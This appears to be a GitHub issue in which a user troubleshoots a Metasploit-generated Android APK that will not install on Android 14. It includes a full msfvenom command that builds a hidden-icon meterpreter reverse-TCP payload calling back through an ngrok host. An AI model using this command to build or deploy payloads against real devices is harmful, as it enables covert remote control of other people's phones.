You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I installed metasploit framework on my local linux laptop.
I setup a TCP tunnel using NGROK on local PORT 1234.
Then I generated an APK file msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true LHOST= (host 0.tcp.in.ngrok.io) LPORT=(ngrok tcp section's given port) -f raw -o androidpayload.apk
I transferred it to my phone via USB and then signed it using "apk-signer" and tried to install the APK.
I get the error "App not installed as app isn't compatible with your phone."
Were you following a specific guide/tutorial or reading documentation?
Steps to reproduce
How'd you do it?
Were you following a specific guide/tutorial or reading documentation?
(https://www.linkedin.com/pulse/android-exploitation-using-metasploit-2024-version-prabhu-desai-7nkpc/)
Expected behavior
The APK should have installed.
Current behavior
"App not installed as app isn't compatible with your phone."
Metasploit version
Framework: 6.4.11-dev-
Console: 6.4.11-dev-
Additional Information
OS Version 1.0.4.0.UCVMIXM
I'm on Android version 14 UP1A.231005.007
Android security update 2024-04-01
The text was updated successfully, but these errors were encountered: